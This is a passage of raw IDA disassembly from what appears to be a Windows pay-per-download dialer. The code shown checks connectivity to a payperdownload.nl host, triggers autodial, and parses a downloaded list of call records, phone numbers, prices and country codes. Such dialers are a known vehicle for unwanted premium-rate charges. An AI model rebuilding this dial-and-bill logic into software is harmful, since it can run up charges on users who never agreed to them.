mov edx, [esp+34h+Memory]
push edx
call ds:dword_40F194
mov al, bl
pop ebx
pop edi
pop esi
add esp, 2Ch
retn 8
sub_406060 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406110 proc near ; CODE XREF: sub_404890+67�p
push ebx
push esi
mov esi, ecx
mov eax, [esi+60h]
xor ebx, ebx
cmp eax, ebx
jz short loc_40613C
cmp eax, 2
jle short loc_406186
cmp eax, 7
jg short loc_406186
push 386h
push 1
mov dword ptr [esi+60h], 8
call sub_406060
jmp short loc_406174
; ---------------------------------------------------------------------------
loc_40613C: ; CODE XREF: sub_406110+B�j
mov al, byte_4120DC
mov edx, [esi+4]
xor ecx, ecx
cmp al, bl
push ebx
setz cl
push ebx
push 184h
push 0CCh
push edx
mov byte_4120DC, bl
mov [esi+58h], bl
lea ecx, [ecx+ecx+1]
mov [esi+60h], ecx
mov [esi+59h], bl
mov [esi+5Ah], bl
call ds:dword_40F1C4 ; SendDlgItemMessageA
loc_406174: ; CODE XREF: sub_406110+2A�j
mov eax, [esi+4]
push ebx
push 0FAh
push 1
push eax
call ds:dword_40F1C0 ; SetTimer
loc_406186: ; CODE XREF: sub_406110+10�j
; sub_406110+15�j
pop esi
xor eax, eax
pop ebx
retn 10h
sub_406110 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406190 proc near ; CODE XREF: sub_406580+27�p
; sub_4065D0+99�p ...
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
mov eax, [ebx]
test eax, eax
push ebp
push esi
push edi
mov ebp, ecx
jz short loc_4061B1
push eax
call ds:dword_40F180
push eax
mov eax, [ebx]
push eax
call ds:dword_40F184
loc_4061B1: ; CODE XREF: sub_406190+E�j
mov [ebp+0], eax
cmp dword ptr [ebx], 0
jz short loc_4061C7
test eax, eax
jnz short loc_4061C7
push 8007000Eh
call loc_4012B0
loc_4061C7: ; CODE XREF: sub_406190+27�j
; sub_406190+2B�j
mov ecx, [ebx+4]
mov [ebp+4], ecx
mov edx, [ebx+8]
mov [ebp+8], edx
lea esi, [ebx+0Ch]
lea edi, [ebp+0Ch]
mov ecx, 7
rep movsd
movsw
mov al, [ebx+2Ah]
pop edi
mov [ebp+2Ah], al
pop esi
mov eax, ebp
pop ebp
pop ebx
retn 4
sub_406190 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406200 proc near ; CODE XREF: sub_404890+14A�p
push 74h
call sub_405FB0
xor eax, eax
retn 10h
sub_406200 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406210 proc near ; CODE XREF: sub_407D40+346�p
var_42C = dword ptr -42Ch
Memory = dword ptr -428h
var_424 = dword ptr -424h
var_420 = byte ptr -420h
var_402 = byte ptr -402h
var_400 = byte ptr -400h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = byte ptr 18h
sub esp, 42Ch
mov eax, [esp+42Ch+arg_10]
push ebx
push esi
mov esi, [esp+434h+arg_0]
mov ecx, [esi+20h]
push edi
xor ebx, ebx
push eax
push ecx
lea ecx, [esp+440h+var_42C]
mov [esp+440h+var_42C], ebx
mov [esp+440h+Memory], ebx
mov [esp+440h+var_424], ebx
mov [esp+440h+var_420], bl
mov [esp+440h+var_402], bl
call sub_401DD0
lea edx, [esp+438h+arg_14]
push edx
lea ecx, [esp+43Ch+var_42C]
call sub_409F60
push eax
lea eax, [esp+440h+var_400]
push eax
call ds:dword_40F1DC ; wvsprintfA
mov ecx, [esi+20h]
push 1FAh
push ecx
lea ecx, [esp+440h+var_42C]
call sub_401DD0
lea ecx, [esp+438h+var_42C]
call sub_409F60
push 10h
push eax
mov eax, [esi+4]
lea edx, [esp+440h+var_400]
push edx
push eax
call ds:dword_40F1D0 ; MessageBoxA
mov ecx, [esp+438h+var_42C]
mov edi, ds:dword_40F194
push ecx
call edi
mov edx, [esi+20h]
push 74h
push edx
lea ecx, [esp+440h+var_42C]
mov [esp+440h+var_42C], ebx
call sub_401DD0
push 3Fh ; Val
lea ecx, [esp+43Ch+var_42C]
call sub_409F60
push eax ; Str
call _strchr
add esp, 8
test eax, eax
mov eax, offset a? ; "?"
jz short loc_4062D7
mov eax, offset asc_40F94C ; "&"
loc_4062D7: ; CODE XREF: sub_406210+C0�j
push eax
lea ecx, [esp+43Ch+var_42C]
call sub_402310
push offset aErrorFatalFile ; "error=fatal&filename="
lea ecx, [esp+43Ch+var_42C]
call sub_402310
mov eax, [esp+438h+arg_4]
push eax
lea ecx, [esp+43Ch+var_42C]
call sub_40A4B0
push offset aLinenumber ; "&linenumber="
lea ecx, [esp+43Ch+var_42C]
call sub_402310
mov ecx, [esp+438h+arg_8]
push ecx
lea ecx, [esp+43Ch+var_42C]
call sub_40A480
push offset aLasterror ; "&lasterror="
lea ecx, [esp+43Ch+var_42C]
call sub_402310
mov edx, [esp+438h+arg_C]
push edx
lea ecx, [esp+43Ch+var_42C]
call sub_40A480
lea ecx, [esp+438h+var_42C]
call sub_409F60
push 1
push ebx
push ebx
push eax
push offset aOpen ; "open"
push ebx
call ds:dword_40F1AC
mov eax, [esi+4]
push eax
call ds:dword_40F200 ; DestroyWindow
push ebx
call ds:dword_40F1D8 ; PostQuitMessage
mov eax, [esp+438h+Memory]
cmp eax, ebx
jz short loc_40637E
push eax ; Memory
call _free
add esp, 4
mov [esp+438h+Memory], ebx
loc_40637E: ; CODE XREF: sub_406210+15F�j
mov ecx, [esp+438h+var_42C]
push ecx
call edi
pop edi
pop esi
pop ebx
add esp, 42Ch
retn
sub_406210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406390 proc near ; CODE XREF: sub_407D40+24B�p
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_5A = byte ptr -5Ah
var_58 = dword ptr -58h
Memory = dword ptr -54h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_2E = byte ptr -2Eh
var_2C = byte ptr -2Ch
sub esp, 84h
push ebx
push ebp
push esi
push edi
mov edi, ecx
mov eax, [edi+20h]
xor ebx, ebx
push 71h
push eax
lea ecx, [esp+9Ch+var_84]
mov [esp+9Ch+var_84], ebx
mov [esp+9Ch+var_80], ebx
mov [esp+9Ch+var_7C], ebx
mov [esp+9Ch+var_78], bl
mov [esp+9Ch+var_5A], bl
call sub_401DD0
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+98h+var_84]
call sub_402310
mov ecx, [edi+20h]
push 7Ah
push ecx
lea ecx, [esp+9Ch+var_84]
call sub_40A1E0
lea ecx, [esp+94h+var_84]
lea esi, [edi+24h]
call sub_409F60
push eax
mov ecx, esi
call sub_408B20
test al, al
mov ebp, ds:dword_40F194
jnz short loc_406409
push esi
mov ecx, edi
call sub_405BF0
jmp loc_40649E
; ---------------------------------------------------------------------------
loc_406409: ; CODE XREF: sub_406390+6A�j
lea ecx, [esp+94h+var_2C]
call sub_409050
lea edx, [esp+94h+var_2C]
push edx
mov ecx, edi
call sub_405BF0
push esi
lea ecx, [esp+98h+var_2C]
call sub_4090B0
test al, al
jz short loc_406489
mov eax, [edi+20h]
push 72h
push eax
lea ecx, [esp+9Ch+var_58]
mov [esp+9Ch+var_58], ebx
mov [esp+9Ch+Memory], ebx
mov [esp+9Ch+var_50], ebx
mov [esp+9Ch+var_4C], bl
mov [esp+9Ch+var_2E], bl
call sub_401DD0
push 0Ah ; Radix
push ebx ; EndPtr
lea ecx, [esp+9Ch+var_58]
call sub_409F60
push eax ; Str
call _strtol
add esp, 0Ch
mov ecx, esi
call sub_408FC0
mov eax, [esp+94h+Memory]
cmp eax, ebx
jz short loc_406480
push eax ; Memory
call _free
add esp, 4
mov [esp+94h+Memory], ebx
loc_406480: ; CODE XREF: sub_406390+E1�j
mov ecx, [esp+94h+var_58]
push ecx
call ebp
jmp short loc_406495
; ---------------------------------------------------------------------------
loc_406489: ; CODE XREF: sub_406390+9A�j
lea edx, [esp+94h+var_2C]
push edx
mov ecx, esi
call sub_409190
loc_406495: ; CODE XREF: sub_406390+F7�j
lea ecx, [esp+94h+var_2C]
call sub_408910
loc_40649E: ; CODE XREF: sub_406390+74�j
mov eax, [edi+20h]
push 6Eh
push eax
mov ecx, esi
call sub_408F20
push 1
mov ecx, esi
call sub_408E80
mov ecx, dword_41252C
push eax
call sub_409780
push 1
mov ecx, esi
call sub_408EC0
mov ecx, dword_41252C
push eax
call sub_4097A0
mov ecx, dword_41252C
push (offset a?+2)
call sub_4096E0
push 1
mov ecx, esi
call sub_408F00
mov ecx, dword_41252C
push eax
call sub_409730
mov ecx, [esp+94h+var_84]
push ecx
call ebp
mov edx, [edi+20h]
push 77h
push edx
lea ecx, [esp+9Ch+var_84]
mov [esp+9Ch+var_84], ebx
call sub_401DD0
lea ecx, [esp+94h+var_84]
call sub_409F60
mov esi, eax
push esi
call ds:dword_40F084 ; lstrlen
cmp eax, ebx
jbe short loc_406533
cmp byte ptr [esi], 31h
jnz short loc_406533
mov cl, 1
jmp short loc_406535
; ---------------------------------------------------------------------------
loc_406533: ; CODE XREF: sub_406390+198�j
; sub_406390+19D�j
xor cl, cl
loc_406535: ; CODE XREF: sub_406390+1A1�j
cmp eax, 1
mov [edi+50h], cl
jbe short loc_406547
cmp byte ptr [esi+1], 31h
jnz short loc_406547
mov al, 1
jmp short loc_406549
; ---------------------------------------------------------------------------
loc_406547: ; CODE XREF: sub_406390+1AB�j
; sub_406390+1B1�j
xor al, al
loc_406549: ; CODE XREF: sub_406390+1B5�j
mov [edi+51h], al
mov eax, [esp+94h+var_80]
cmp eax, ebx
jz short loc_406561
push eax ; Memory
call _free
add esp, 4
mov [esp+94h+var_80], ebx
loc_406561: ; CODE XREF: sub_406390+1C2�j
mov eax, [esp+94h+var_84]
push eax
call ebp
pop edi
pop esi
pop ebp
pop ebx
add esp, 84h
retn
sub_406390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406580 proc near ; CODE XREF: sub_408350+1EB�p
; sub_408350+235�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [ecx+20h]
push esi
mov esi, [esp+4+arg_8]
push edi
mov edi, [esp+8+arg_4]
lea eax, [edi+24B8h]
push eax
push ecx
mov ecx, esi
call sub_401DD0
test al, al
push esi
mov esi, [esp+0Ch+arg_0]
jz short loc_4065B3
mov ecx, esi
call sub_406190
pop edi
mov eax, esi
pop esi
retn 0Ch
; ---------------------------------------------------------------------------
loc_4065B3: ; CODE XREF: sub_406580+23�j
mov ecx, dword_41252C
push edi
push esi
call sub_409F00
pop edi
mov eax, esi
pop esi
retn 0Ch
sub_406580 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4065D0 proc near ; CODE XREF: sub_408350+121�p
; sub_408350+1A9�p ...
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_2E = byte ptr -2Eh
var_2C = dword ptr -2Ch
Memory = dword ptr -28h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 58h
push ebx
push esi
mov esi, [esp+60h+arg_4]
xor ebx, ebx
cmp esi, ebx
push edi
mov edi, ecx
jnz short loc_406634
mov ecx, [esp+64h+arg_0]
xor eax, eax
jmp short loc_4065F0
; ---------------------------------------------------------------------------
align 10h
loc_4065F0: ; CODE XREF: sub_4065D0+18�j
; sub_4065D0+2D�j
cmp ds:dword_40F800[eax*8], ecx
jz short loc_40661A
inc eax
cmp eax, 1Fh
jb short loc_4065F0
mov eax, 12Bh
push eax
push edi
mov [edi+54h], ecx
call sub_405D70
add esp, 8
pop edi
pop esi
pop ebx
add esp, 58h
retn 8
; ---------------------------------------------------------------------------
loc_40661A: ; CODE XREF: sub_4065D0+27�j
mov eax, ds:dword_40F804[eax*8]
push eax
push edi
call sub_405D70
add esp, 8
pop edi
pop esi
pop ebx
add esp, 58h
retn 8
; ---------------------------------------------------------------------------
loc_406634: ; CODE XREF: sub_4065D0+10�j
mov ecx, [edi+20h]
lea eax, [esi+24B8h]
push eax
push ecx
lea ecx, [esp+6Ch+var_58]
mov [esp+6Ch+var_58], ebx
mov [esp+6Ch+var_54], ebx
mov [esp+6Ch+var_50], ebx
mov [esp+6Ch+var_4C], bl
mov [esp+6Ch+var_2E], bl
call sub_401DD0
test al, al
lea ecx, [esp+64h+var_2C]
jz short loc_406670
lea edx, [esp+64h+var_58]
push edx
call sub_406190
jmp short loc_406682
; ---------------------------------------------------------------------------
loc_406670: ; CODE XREF: sub_4065D0+92�j
lea eax, [esp+64h+var_58]
push eax
push esi
push ecx
mov ecx, dword_41252C
call sub_409F00
loc_406682: ; CODE XREF: sub_4065D0+9E�j
lea ecx, [esp+64h+var_2C]
call sub_409F60
push eax
push offset aS ; "%s"
push edi
call sub_405E40
mov eax, [esp+70h+Memory]
add esp, 0Ch
cmp eax, ebx
jz short loc_4066AF
push eax ; Memory
call _free
add esp, 4
mov [esp+64h+Memory], ebx
loc_4066AF: ; CODE XREF: sub_4065D0+D0�j
mov edx, [esp+64h+var_2C]
mov esi, ds:dword_40F194
push edx
call esi
mov eax, [esp+64h+var_54]
cmp eax, ebx
jz short loc_4066D1
push eax ; Memory
call _free
add esp, 4
mov [esp+64h+var_54], ebx
loc_4066D1: ; CODE XREF: sub_4065D0+F2�j
mov eax, [esp+64h+var_58]
push eax
call esi
pop edi
pop esi
pop ebx
add esp, 58h
retn 8
sub_4065D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4066F0 proc near ; CODE XREF: sub_407D40+18D�p
var_90D = byte ptr -90Dh
var_90C = byte ptr -90Ch
var_90B = byte ptr -90Bh
var_90A = byte ptr -90Ah
var_909 = byte ptr -909h
var_908 = dword ptr -908h
var_904 = dword ptr -904h
var_900 = dword ptr -900h
var_8FC = dword ptr -8FCh
var_8F8 = dword ptr -8F8h
var_8F4 = dword ptr -8F4h
var_8F0 = dword ptr -8F0h
var_8EC = dword ptr -8ECh
var_8E8 = dword ptr -8E8h
var_8E4 = dword ptr -8E4h
var_8DC = dword ptr -8DCh
var_8D8 = dword ptr -8D8h
var_8D4 = dword ptr -8D4h
var_8D0 = dword ptr -8D0h
var_8CC = dword ptr -8CCh
var_8C8 = dword ptr -8C8h
var_8C4 = dword ptr -8C4h
var_8C0 = dword ptr -8C0h
var_8BC = dword ptr -8BCh
var_8B8 = dword ptr -8B8h
var_8B4 = dword ptr -8B4h
var_8AC = byte ptr -8ACh
var_8A0 = byte ptr -8A0h
var_898 = byte ptr -898h
var_88C = dword ptr -88Ch
var_888 = dword ptr -888h
var_884 = dword ptr -884h
var_880 = byte ptr -880h
var_862 = byte ptr -862h
var_860 = byte ptr -860h
var_858 = byte ptr -858h
var_840 = byte ptr -840h
var_838 = byte ptr -838h
var_820 = byte ptr -820h
Str2 = byte ptr -800h
var_7FC = byte ptr -7FCh
sub esp, 910h
push esi
mov esi, ds:dword_40F250
push edi
push 0
push 1
mov edi, ecx
push offset aHttpPrs_payper ; "http://prs.payperdownload.nl"
mov [esp+924h+var_8C4], edi
call esi ; InternetCheckConnectionA
test eax, eax
jnz short loc_40673B
mov al, [edi+58h]
test al, al
jnz loc_406FCA
push 0
push 2
call ds:dword_40F24C ; InternetAutodial
push 0
push 1
push offset aHttpPrs_payper ; "http://prs.payperdownload.nl"
call esi ; InternetCheckConnectionA
test eax, eax
jz loc_406FCA
loc_40673B: ; CODE XREF: sub_4066F0+21�j
push 0
push 0
push 0
push 0
push offset aDel ; "del"
call ds:dword_40F248 ; InternetOpenA
test eax, eax
mov [esp+918h+var_8B8], eax
jz loc_406FCA
push ebx
push ebp
push 0
push 0
push 0
push 0
push offset aHttpPrs_payp_0 ; "http://prs.payperdownload.nl/radius/dia"...
push eax
call ds:dword_40F244 ; InternetOpenUrlA
test eax, eax
mov [esp+91Ch+var_8B8], eax
jz loc_406FAD
lea ecx, [esp+91Ch+var_8BC]
push ecx
push 800h
lea edx, [esp+924h+var_7FC]
push edx
push eax
mov esi, 0FFFFFFFDh
call ds:dword_40F254 ; InternetReadFile
test eax, eax
jz loc_406F8A
mov ecx, [esp+920h+var_8C0]
test ecx, ecx
jz loc_406F8A
xor eax, eax
xor bl, bl
xor ebp, ebp
xor edx, edx
xor esi, esi
cmp ecx, eax
mov [esp+ecx+920h+Str2], 0
mov byte ptr [esp+920h+var_908+1], 0
mov byte ptr [esp+920h+var_908], 0
mov byte ptr [esp+920h+var_908+2], 0
mov byte ptr [esp+920h+var_904+2], 0
mov byte ptr [esp+920h+var_904+1], 0
mov byte ptr [esp+920h+var_908+3], 0
mov byte ptr [esp+920h+var_904], 0
mov [esp+920h+var_90C], 0
mov [esp+920h+var_90A], 0
mov [esp+920h+var_909], 0
mov [esp+920h+var_90B], 0
mov [esp+920h+var_90D], bl
mov byte ptr [esp+920h+var_904+3], bl
mov [esp+920h+var_8CC], eax
mov [esp+920h+var_8D8], eax
mov [esp+920h+var_8F0], eax
mov [esp+920h+var_8E8], eax
mov [esp+920h+var_8F8], eax
mov [esp+920h+var_8C8], eax
mov [esp+920h+var_8FC], eax
mov [esp+920h+var_8D0], ebp
mov [esp+920h+var_8F4], eax
mov [esp+920h+var_8D4], edx
mov [esp+920h+var_900], eax
mov [esp+920h+var_8DC], eax
jbe loc_406B40
mov ebp, 1
lea edi, [esp+920h+Str2]
loc_406843: ; CODE XREF: sub_4066F0+43E�j
mov al, byte ptr [esp+920h+var_904+3]
test al, al
jnz loc_406B34
movsx eax, byte ptr [edi]
sub eax, 22h
jz loc_406A48
sub eax, 1Ah
jz loc_406A3E
sub eax, 2
jz loc_406A10
cmp esi, 7D0h
ja loc_406F75
mov al, byte ptr [esp+920h+var_908+2]
test al, al
jz short loc_4068ED
push 0Bh ; MaxCount
push edi ; Str2
push offset Str1 ; "callrecords"
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4068A8
add esi, 0Ah
add edi, 0Ah
mov byte ptr [esp+920h+var_908+1], 1
add ebp, 0Ah
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_4068A8: ; CODE XREF: sub_4066F0+1A3�j
push 0Ch ; MaxCount
push edi ; Str2
push offset aCallrecords_0 ; "/callrecords"
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4068C6
mov byte ptr [esp+920h+var_904+3], 1
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_4068C6: ; CODE XREF: sub_4066F0+1CA�j
push 4 ; MaxCount
push edi ; Str2
push offset aCall ; "call"
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4068ED
add esi, 3
add edi, 3
mov byte ptr [esp+920h+var_908], 1
add ebp, 3
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_4068ED: ; CODE XREF: sub_4066F0+18F�j
; sub_4066F0+1E8�j
mov al, byte ptr [esp+920h+var_908]
test al, al
jz loc_406B25
push 0Ah ; MaxCount
push edi ; Str2
push offset aRealnumber ; "realnumber"
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_40695F
mov [esp+920h+var_90C], al
mov [esp+920h+var_90A], al
mov [esp+920h+var_909], al
mov [esp+920h+var_90B], al
mov al, byte ptr [esp+920h+var_904+1]
test al, al
jnz short loc_40693E
xor bl, bl
add esi, 9
add edi, 9
mov [esp+920h+var_909], 1
mov [esp+920h+var_90D], bl
add ebp, 9
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_40693E: ; CODE XREF: sub_4066F0+233�j
mov al, byte ptr [esp+920h+var_908+3]
test al, al
jnz short loc_40694B
mov [esp+920h+var_90B], 1
loc_40694B: ; CODE XREF: sub_4066F0+254�j
xor bl, bl
add esi, 9
add edi, 9
mov [esp+920h+var_90D], bl
add ebp, 9
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_40695F: ; CODE XREF: sub_4066F0+21B�j
push 5 ; MaxCount
push edi ; Str2
push offset aPrice ; "price"
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4069B4
mov [esp+920h+var_90C], al
mov [esp+920h+var_90A], al
mov [esp+920h+var_909], al
mov [esp+920h+var_90B], al
mov al, byte ptr [esp+920h+var_904]
xor bl, bl
test al, al
mov [esp+920h+var_90D], bl
jnz short loc_4069A1
add esi, 4
add edi, 4
mov bl, 1
add ebp, 4
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_4069A1: ; CODE XREF: sub_4066F0+29F�j
add esi, 4
add edi, 4
mov [esp+920h+var_90D], 1
add ebp, 4
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_4069B4: ; CODE XREF: sub_4066F0+281�j
push 0Bh ; MaxCount
push edi ; Str2
push offset aCountrycode ; "countrycode"
call _strncmp
add esp, 0Ch
test eax, eax
jnz loc_406B25
mov [esp+920h+var_90C], al
mov [esp+920h+var_90A], al
mov [esp+920h+var_909], al
mov [esp+920h+var_90B], al
mov al, byte ptr [esp+920h+var_904+2]
xor bl, bl
test al, al
mov [esp+920h+var_90D], bl
jnz short loc_4069FD
add esi, 4
add edi, 4
mov [esp+920h+var_90C], 1
add ebp, 4
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_4069FD: ; CODE XREF: sub_4066F0+2F8�j
add esi, 4
add edi, 4
mov [esp+920h+var_90A], 1
add ebp, 4
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_406A10: ; CODE XREF: sub_4066F0+177�j
mov al, byte ptr [esp+920h+var_908+1]
test al, al
jz short loc_406A27
mov byte ptr [esp+920h+var_908+1], 0
mov byte ptr [esp+920h+var_908+2], 0
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_406A27: ; CODE XREF: sub_4066F0+326�j
mov al, byte ptr [esp+920h+var_908]
test al, al
jz short loc_406A34
mov byte ptr [esp+920h+var_908], 0
loc_406A34: ; CODE XREF: sub_4066F0+33D�j
mov byte ptr [esp+920h+var_908+2], 0
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_406A3E: ; CODE XREF: sub_4066F0+16E�j
mov byte ptr [esp+920h+var_908+2], 1
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_406A48: ; CODE XREF: sub_4066F0+165�j
mov al, [esp+920h+var_909]
test al, al
jz short loc_406A74
mov eax, [esp+920h+var_8F8]
test eax, eax
jle short loc_406A6B
mov [esp+920h+var_909], 0
mov byte ptr [esp+920h+var_904+1], 1
mov [esp+920h+var_8C8], esi
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_406A6B: ; CODE XREF: sub_4066F0+366�j
mov [esp+920h+var_8F8], ebp
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_406A74: ; CODE XREF: sub_4066F0+35E�j
mov al, [esp+920h+var_90B]
test al, al
jz short loc_406AA0
mov eax, [esp+920h+var_8FC]
test eax, eax
jle short loc_406A97
mov [esp+920h+var_90B], 0
mov byte ptr [esp+920h+var_908+3], 1
mov [esp+920h+var_8D0], esi
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_406A97: ; CODE XREF: sub_4066F0+392�j
mov [esp+920h+var_8FC], ebp
jmp loc_406B25
; ---------------------------------------------------------------------------
loc_406AA0: ; CODE XREF: sub_4066F0+38A�j
test bl, bl
jz short loc_406ABF
mov eax, [esp+920h+var_8F4]
test eax, eax
jle short loc_406AB9
xor bl, bl
mov byte ptr [esp+920h+var_904], 1
mov [esp+920h+var_8D4], esi
jmp short loc_406B25
; ---------------------------------------------------------------------------
loc_406AB9: ; CODE XREF: sub_4066F0+3BA�j
mov [esp+920h+var_8F4], ebp
jmp short loc_406B25
; ---------------------------------------------------------------------------
loc_406ABF: ; CODE XREF: sub_4066F0+3B2�j
mov al, [esp+920h+var_90D]
test al, al
jz short loc_406AE0
mov eax, [esp+920h+var_900]
test eax, eax
jle short loc_406ADA
mov [esp+920h+var_90D], 0
mov [esp+920h+var_8DC], esi
jmp short loc_406B25
; ---------------------------------------------------------------------------
loc_406ADA: ; CODE XREF: sub_4066F0+3DD�j
mov [esp+920h+var_900], ebp
jmp short loc_406B25
; ---------------------------------------------------------------------------
loc_406AE0: ; CODE XREF: sub_4066F0+3D5�j
mov al, [esp+920h+var_90C]
test al, al
jz short loc_406B06
mov eax, [esp+920h+var_8CC]
test eax, eax
jle short loc_406B00
mov [esp+920h+var_90C], 0
mov byte ptr [esp+920h+var_904+2], 1
mov [esp+920h+var_8D8], esi
jmp short loc_406B25
; ---------------------------------------------------------------------------
loc_406B00: ; CODE XREF: sub_4066F0+3FE�j
mov [esp+920h+var_8CC], ebp
jmp short loc_406B25
; ---------------------------------------------------------------------------
loc_406B06: ; CODE XREF: sub_4066F0+3F6�j
mov al, [esp+920h+var_90A]
test al, al
jz short loc_406B25
mov eax, [esp+920h+var_8F0]
test eax, eax
jle short loc_406B21
mov [esp+920h+var_90A], 0
mov [esp+920h+var_8E8], esi
jmp short loc_406B25
; ---------------------------------------------------------------------------
loc_406B21: ; CODE XREF: sub_4066F0+424�j
mov [esp+920h+var_8F0], ebp
loc_406B25: ; CODE XREF: sub_4066F0+1B3�j
; sub_4066F0+1D1�j ...
mov eax, [esp+920h+var_8C0]
inc esi
inc edi
inc ebp
cmp esi, eax
jb loc_406843
loc_406B34: ; CODE XREF: sub_4066F0+159�j
mov edx, [esp+920h+var_8D4]
mov ebp, [esp+920h+var_8D0]
mov eax, [esp+920h+var_8C8]
loc_406B40: ; CODE XREF: sub_4066F0+141�j
mov esi, [esp+920h+var_8F8]
sub eax, esi
cmp eax, 13h
mov [esp+920h+var_8F8], eax
mov ecx, 13h
jg short loc_406B56
mov ecx, eax
loc_406B56: ; CODE XREF: sub_4066F0+462�j
mov ebx, ecx
shr ecx, 2
lea esi, [esp+esi+920h+Str2]
lea edi, [esp+920h+var_8B4]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov esi, [esp+920h+var_8FC]
sub ebp, esi
mov byte ptr [esp+eax+920h+var_8B4], 0
mov eax, ebp
cmp eax, 13h
mov [esp+920h+var_8FC], eax
mov ecx, 13h
jg short loc_406B8C
mov ecx, eax
loc_406B8C: ; CODE XREF: sub_4066F0+498�j
mov ebx, ecx
shr ecx, 2
lea esi, [esp+esi+920h+Str2]
lea edi, [esp+920h+var_8A0]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov esi, [esp+920h+var_8F4]
sub edx, esi
mov [esp+eax+920h+var_8A0], 0
mov eax, edx
cmp eax, 1Dh
mov [esp+920h+var_8F4], eax
mov ecx, 1Dh
jg short loc_406BC8
mov ecx, eax
loc_406BC8: ; CODE XREF: sub_4066F0+4D4�j
mov ebp, [esp+920h+var_8DC]
mov edx, ecx
shr ecx, 2
lea esi, [esp+esi+920h+Str2]
lea edi, [esp+920h+var_860]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
sub ebp, [esp+920h+var_900]
cmp ebp, 1Dh
mov [esp+eax+920h+var_860], 0
mov ecx, 1Dh
jg short loc_406C00
mov ecx, ebp
loc_406C00: ; CODE XREF: sub_4066F0+50C�j
mov esi, [esp+920h+var_900]
mov ebx, [esp+920h+var_8D8]
mov eax, ecx
shr ecx, 2
lea esi, [esp+esi+920h+Str2]
lea edi, [esp+920h+var_840]
rep movsd
mov ecx, eax
mov eax, [esp+920h+var_8CC]
and ecx, 3
sub ebx, eax
cmp ebx, 4
rep movsb
mov [esp+ebp+920h+var_840], 0
mov ecx, 4
jg short loc_406C3E
mov ecx, ebx
loc_406C3E: ; CODE XREF: sub_4066F0+54A�j
mov edx, ecx
shr ecx, 2
lea esi, [esp+eax+920h+Str2]
mov eax, [esp+920h+var_8E8]
lea edi, [esp+920h+var_8E4]
rep movsd
mov ecx, edx
mov edx, [esp+920h+var_8F0]
and ecx, 3
sub eax, edx
cmp eax, 4
rep movsb
mov byte ptr [esp+ebx+920h+var_8E4], 0
mov [esp+920h+var_8E8], eax
mov ecx, 4
jg short loc_406C76
mov ecx, eax
loc_406C76: ; CODE XREF: sub_4066F0+582�j
lea esi, [esp+edx+920h+Str2]
mov edx, ecx
shr ecx, 2
lea edi, [esp+920h+var_8F0]
rep movsd
mov ecx, edx
and ecx, 3
test ebx, ebx
rep movsb
mov byte ptr [esp+eax+920h+var_8F0], 0
jle loc_406DF1
mov eax, [esp+920h+var_8E8]
test eax, eax
jle loc_406DF1
push ebx ; MaxCount
lea eax, [esp+924h+var_8E4]
push eax ; Str2
push offset aXx_0 ; "xx"
call _strncmp
add esp, 0Ch
test eax, eax
jz short loc_406CDA
push ebx ; MaxCount
lea ecx, [esp+924h+var_8E4]
push ecx ; Str2
push offset aXx ; "XX"
call _strncmp
add esp, 0Ch
test eax, eax
jnz loc_406DF1
loc_406CDA: ; CODE XREF: sub_4066F0+5CD�j
mov eax, [esp+920h+var_8F8]
mov ecx, eax
mov edx, ecx
shr ecx, 2
lea esi, [esp+920h+var_8B4]
lea edi, [esp+920h+var_820]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [esp+920h+var_8F4]
mov [esp+920h+var_8D8], ecx
mov edx, ecx
shr ecx, 2
lea esi, [esp+920h+var_860]
lea edi, [esp+920h+var_88C]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov edx, [esp+920h+var_8FC]
mov ecx, edx
mov [esp+920h+var_8DC], ebx
mov ebx, ecx
shr ecx, 2
lea esi, [esp+920h+var_8A0]
lea edi, [esp+920h+var_8B4]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ebx, [esp+920h+var_8E8]
